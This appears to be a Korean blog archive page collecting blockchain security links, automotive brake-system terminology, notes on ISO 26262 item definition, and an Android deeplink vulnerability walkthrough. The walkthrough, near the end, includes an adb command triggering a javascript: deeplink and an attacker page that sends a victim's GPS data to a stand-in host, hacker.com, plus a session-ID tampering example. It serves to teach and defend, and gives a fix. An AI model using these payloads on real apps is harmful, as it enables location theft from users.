'경로 및 정보'에 해당되는 글 192건

https://av.tib.eu/media/39853

참고

https://cybertalents.com/competitions/asrg-ctf/challenges

•1. 이더스캔 접속 : https://etherscan.io/
•2. Transaction 선택
•3. Contract
•4. Code
•5. Read Contract

https://orbing.tistory.com/category/%EB%B8%94%EB%A1%9D%EC%B2%B4%EC%9D%B8

https://medium.com/@heuristicwave

블록체인 관련 서적
•마스터링 이더리움
•마스터링 비트코인
•Ethernaut : 블록체인 Wargame
•Write-ups
•https://orbing.tistory.com/category/%EB%B8%94%EB%A1%9D%EC%B2%B4%EC%9D%B8
•https://medium.com/@heuristicwave
•블록체인 해킹 가이드
•https://github.com/immunefi-team/Web3-Security-Library
•https://medium.com/coinmonks/getting-started-web3-bug-bounties-and-security-2b28c8646f63
•https://losslessdefi.medium.com/defi-101-how-to-become-smart-contract-bug-hunter-a5eddab8c7be
•주요 취약점 모음
•https://web3sec.notion.site/web3sec/a69bae6e397c4cdb80b4d120c08bc263?v=3dab7e34c83942abb6a90cd699156ab7
•https://ventral.digital/posts/2022/12/15/ethereum-smart-contract-auditors-2022-rewind
•https://hacked.slowmist.io/
•https://rekt.news/ko/
•블록체인 오디팅 보고서들
•https://immunefi.medium.com/
•https://blog.kalos.xyz/
•https://github.com/sherlock-protocol/sherlock-reports
•https://github.com/HalbornSecurity/PublicReports/tree/master/Solidity%20Smart%20Contract%20Audits
•https://github.com/peckshield/publications/tree/master/audit_reports

전장관련 용어(Braking System 중심.. : 네이버블로그 (naver.com)

Moc(Motor on Caliper) : 모터 장착 캘리퍼

EPB(Electronic Parking Brake) : 전자식 주차 브레이크

ABS(Anti-lock Breaking System) : 브레이크 잠김 방지 장치 --> 감속 시 제어

TCS(Traction Control System) : 구동력 제어장치 --> 가속 시 제어

ESP(Electronic Stability Program) : 차량 전복방지

ESC(Electronic Stability Control) : 차량 자세제어 장치

LDWS(Lane Departure Waring System) : 차선이탈 경고장치

LKS(Lane Keeping System) : 차선 유지 시스템

LKAS(Lane Keeping Assist System)

MFC(Multi Function Camera) : 멀티 기능 모노 카메라

PAS(Parking Assist System)

 ABS 기능이 마비되는 비상상태에 대한 대책으로 전자식 주차 브레이크(EPB: Electronic Parking Brake)를 대체제로 활용하여 비상시에도 운전자가 안전하게 정차할 수 있도록 하는 연구가 최근에 발표된 바 있다.

 EPB는 크게 케이블 풀리 타입, 캘리퍼 타입으로 구분할 수 있고 모터로 구동되는 캘리퍼 타입인 Moc(Motor on Caliper)가 많은 차종에 탑재되어 있다. 이는 Moc 스크류를 통해 브레이크 패드로 브레이크 디스크를 눌러 그 둘 사이의 마찰력으로 브레이크의 제동력을 발생시킨다. 이와 같이 EPB는 전자적으로 제어가 가능하기에 ABS와 유사한 형태로 제어기법을 적용하여 EPB 다이나믹 브레이킹 제어설계가 가능하다.

<전자 브레이크 시스템 MK 100 ESC>

출처 : Continental 홈페이지 

ABS(Anti-Lock Brake System) 및 TCS(Traction Control System)기능에 더하여 추가된 센서의 신호를 받아 주행 차량의 선회 중 불안정한 차량 거동으로 인한 위급 상황시 자동으로 각 바퀴를 독립적으로 감속 제어하거나 엔진 출력을 제어하여 차량의
조정 안전성을 확보하는 제어 장치입니다. 또한 장애물 회피 기동 제어, 안정된 코너링 주행과 제동 및 구동 시 미끄럼방지 제어를
동시에 구현할 수 있습니다.

EBS( Mobis에는 MEB, iMEB라고 표현함 Mobis Electronic Brake)

출처 : MOBIS홈페이지

MFC(멀티 기능 모노카메라)

EPB - Electronic Parking Brake

간단한 스위치 조작만으로 주차 브레이크를 작동/해제 할 수 있으며 실내 공간 활용 용이성과 신호대기 또는 차량정체 구간에서
잦은 브레이크 페달 조작으로 운전자의 피로를 경감시켜줍니다. 경사로에서는 출발을 위해 가속 페달을 밟으면 차량이 뒤로 밀리지 않도록 하면서 체결된 주차 브레이크를 자동으로 해제해 주며 주행 중 브레이크 파열 및 브레이크 페달을 작동할 수 없는 상황에서 EPB 스위치를 이용하여, 긴급상황에 차량의 비상제동이 가능한 차세대 브레이크 시스템으로 Cable Puller Type과 Motor on Caliper Type이 있습니다.

EPB 구조

 ESC는 현재 가장 중요한 능동  안전 시스템으로 위험한 주행 상태를 방지한다. 시스템이 휠 속도 센서, 조향각 센서, 요레이트 및 횡 방향 가속도 센서의 측정 데이터를 지속적으로 분석해 운전자의 지정값을 실제 차량 특성과 비교한다. 갑작스런 조향의 결과로 차체 거동에 불안정한 상태가 감지되면, ESC가 밀리세컨드 내에 반응해 휠을 개별적으로 제동하고 엔진 토크를 조정해 차량을 안정화시킨다. 차가 급제동을 할 때 휠이 잠길 위험이 있을 때는 ABS가 제동력의 전자식 제어를 통해 이같은 현상을 방지하고 조향을 가능한 안정적 상태로 만든다.

 기본적 브레이크 시스템은 ABS, TCS, ESC 및 전자 주차 브레이크(EPB)를 포함한다.

ESC/ESP를 구성하는 부품들 ( 출처 : 다음블로그 )

ESC(ECU)와 Wheel Sensor, Pedal Sensor, G Sensor ?

Item definition (tistory.com)

Item definition, 아이템 정의

ISO 26262 Part 1.Vocabulary의 정의를 인용하여

1.69

item

system or array of systems to implement a function at the vehicle level, to which ISO 26262 is applied 

아이템

ISO 26262가 적용되는 자동차 수준에서 기능을 수행하는 시스템 또는 시스템 배열

어려운 영어가 아니니 해석은 되겠지만, 아이템이 시스템 또는 시스템 배열이라고?

이는 ISO 26262 Part 10. Guideline 를 활용해서 확인해 보자.

Figure 4. Example item dissolution

Element는 Hardware부터 System까지 폭 넓게 사용될 수 있다.

이노무 단어가 너무 폭 넓게 되어 있으니까 가끔 어떻게 이해해야 할지 헷갈려 할 때가 있다.

(버럭 버럭)

그럼 Component는 무엇인가?

1.15

component

non-system level element that is logically and technically separate and is comprised of more than one hardware part or of one of one or more software units

컴포넌트

논리적 및 기술적으로 분리 가능하고, 하나 이상의 하드웨어 소자나 하나 이상의 소프트웨어 단위으로 구성된 것으로, 시스템 수준은 아닌 엘리먼트

비고. 컴포넌트는 시스템의 일부이다.

자 그럼 이 글의 제목에서 말한 Item definition, 아이템 정의를 말해보자.(ISO 26262 Part 3. clause 5 참조)

첫번 째 목적은, 아이템 정의의 목적은 아이템, 환경과 기타 아이템과의 의존성 및 상호작용을 정의하고 기술하는 것이다.

두 번재 목적은, 아이템에 대한 적절한 이해와 그 다음 단계의 활동이 수행될 수 있도록 지원하는 것이다.

아이템 정의는 개발하고자 하는 범위를 정확히 정해놓고 시작하자는 것이다.

Figure 22. Item boundary

위 ISO 26262 Guideline 그림을 보자.

점선으로 테두리가 쳐진 부분이 아이템 정의, Item definition이다.

예를 들면 Actuator control ECU는 아이템 정의 내에 있다. 달리 말하면 VS ECU는 개발 범위에 속하지 않는다. 그저 내용을 받아오면 된다.

그럼 받아만 오면 되는 것이냐? 

이런 얘기를 하는 것은 당연히 아니라는 것이겠다.

ISO 26262 Part 3

5.4.2 아이템, 그 아이템의 인터페이스, 그리고 타 아이템과 엘리먼트와의 상호작용과 관련된 가정에 대한 경계는 다음 사항을 고려하여 정의해야 한다.

위 문장에 대해 자세히 a) ~ g)까지 설명은

다른 아이템과의 상호작용, 영향, 기능 분배, 등등에 대하여 고려하고 있다.

아이템 정의 시

ISO 26262 Part 3

5.4.1 아이템과 환경 사이의 의존성은 물론, 아이템의 기능 및 비기능 요구사항에 대한 정보를 이용 가능해야 한다.

아이템과 관련하여 다 정의해야 한다는 것이다.

a) 작동모드와 상태를 포함하는 아이템의 기능과 목적을 기술하는 기능 개념

b) 운영 및 환경 제약 사항

c) 법률적 요구사항(특히 법과 규정), 국가표준과 국제표준

d) 해당되는 경우에 한해, 유사한 기능, 아이템 및 엘리먼트에 의해 달성되는 동작

e) 아이템에서 예상되는 동작에 대한 가정

f) 알려진 고장형태와 위험원을 포함하는 동작결여로 인해 발생할 수 있는 잠재적 결과

고려할게 참 많지 않은가?

그런데, 해당 아이템 정의는 보시다시피 안전(Safety)를 고려하지 않았다.

왜?

이유는 아직 개발 처음이기 때문이다.

개발 초기부터 어떤 기능안전컨셉을 가지고 갈지 정해지지 않았다.

아이템 범위를 정했으니,다음 작업은 어떤 수명주기를 착수하고, ASIL 부여하여 Safety goal를 설정하여

레벨에 맞게끔 개발을 정해야 한다.

Figure 23. Second iteration on the item design

Figure 22과 Figure 23의 차이는 Redundant Switch를 추가하였다.

이는 아이템 정의가 초기 정해지고, Hazard Analysis and Risk Assessment를 통해 ASIL 을 결정하고,

ASIL 레벨에 다라 안전 컨셉을 부여하게 된다.

위 Figure 23은 ASIL C에 따라 Redundant Swith를 부여한 경우이다.

많은 경우 Redundancy를 고려할 수 있겠지만, ASIL A의 경우에는 권장사항도 아니다.

ASIL에 맞게끔 공대생 답게 가격경쟁력을 가진 개발을 위한 머리를 굴려야하겠다.

지끈 지끈 해보자

BMW에서 발견된 소프트웨어 취약보안점, OBD2와 CAN통신은? : 네이버 포스트 (naver.com)

'ISMS' vs 'CSMS' (brunch.co.kr)

GitHub - andreia-oca/awesome-embedded-fuzzing: A list of resources (papers, books, talks, frameworks, tools) for understanding fuzzing for IoT/embedded devices.

안드로이드 딥링크 취약점 (tistory.com)

ி 딥링크 취약점 실행 과정

1. AndroidManifest.xml 파일 내 application 태그에서 MainActivity 내 딥링크 사용 확인

딥링크: app://deeplink/load.jsp

2. getQueryParameter 함수를 통해 딥링크의 파라미터(Url) 값 확인이 가능하며 해당 파라미터를 이용하여 웹뷰를 실행하는 딥링크 앱인 것을 확인(url 검증 로직이 존재하지 않아 Open Redirect 취약점 연계 가능)

딥링크: app://deeplink/load.jsp?Url=

3. MainActivity 내 자바스크립트 인터페이스를 사용하는 getGPSLocation() 함수 확인,
해당 함수 실행 시 evaluateJavascript를 통해 send_gpsinfo 함수 실행

JavascriptInterface: 안드로이드와 웹뷰의 통신을 위해 만들어진 인터페이스이며
웹뷰 내 자바스크립트로 안드로이드 함수를 호출하거나 안드로이드에서 웹뷰의 자바스크립트 실행 가능
evaluateJavascript: 안드로이드에서 웹뷰 내의 자바스크립트 실행 가능

4. 공격자 서버로 이동되도록 poc 작성 후 딥링크 실행(피해자가 피싱에 의해 실행했다고 가정)
app://deeplink/load.jsp?Url=https://hacker.com/hacker_link.php"

딥링크 실행 방법 1. 딥링크 테스트 사이트 이용(https://jdh5202.tistory.com/951)
방법 2. 단말기 내에서 html 파일 생성 후 a 태그로 딥링크를 작성하여 요청
방법 3. adb 명령어 이용( adb shell am start -W -a android.intent.action.VIEW -d "deeplink" 패키지명
ex)adb shell am start -W -a android.intent.action.VIEW -d "app://deeplink/load.jsp?Url=javascript:Android.getGPSLocation\(\)" com.example.recv_deeplink

공격자 서버 페이지(hacker_link.php) 코드

 <html><head><script>
 function send_gpsinfo(gps_info)
 { 
 // gps 정보 출력 
 document.getElementById("result").innerHTML = gps_info; 
 
 // 공격자 서버로 피해자의 gps 정보를 전송
 client = new XMLHttpRequest();
 client.open('POST', 'https://hacker.com/saveGPSinfo.php',true);
 client.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
 client.send("gpsinfo=" + gps_info);
 }   
 </script></head><body><center>
 
 <!-- 딥링크 -->
 <a href="javascript:window.Android.getGPSLocation();">Click me!</a>
 
 <div id="result"></div>
 </center></body></html>

End. 피해자가 딥링크 클릭 시 공격자 서버로 GPS 정보가 전송됨

참고: 해당 취약점을 확인하려면 인텐트 스키마 및 JavascriptInterface 개념을 이해하고 있어야 한다.
취약점 조치방법은 allow-list 방식으로 인가된 URI에 대해서만 JavascriptInterface 권한을 부여하도록 설정한다. 

 

ி 딥링크 취약점 사례

example://exam.com/v1/users/sessionId=jdh5202  -> example://exam.com/v1/users/sessionId=admin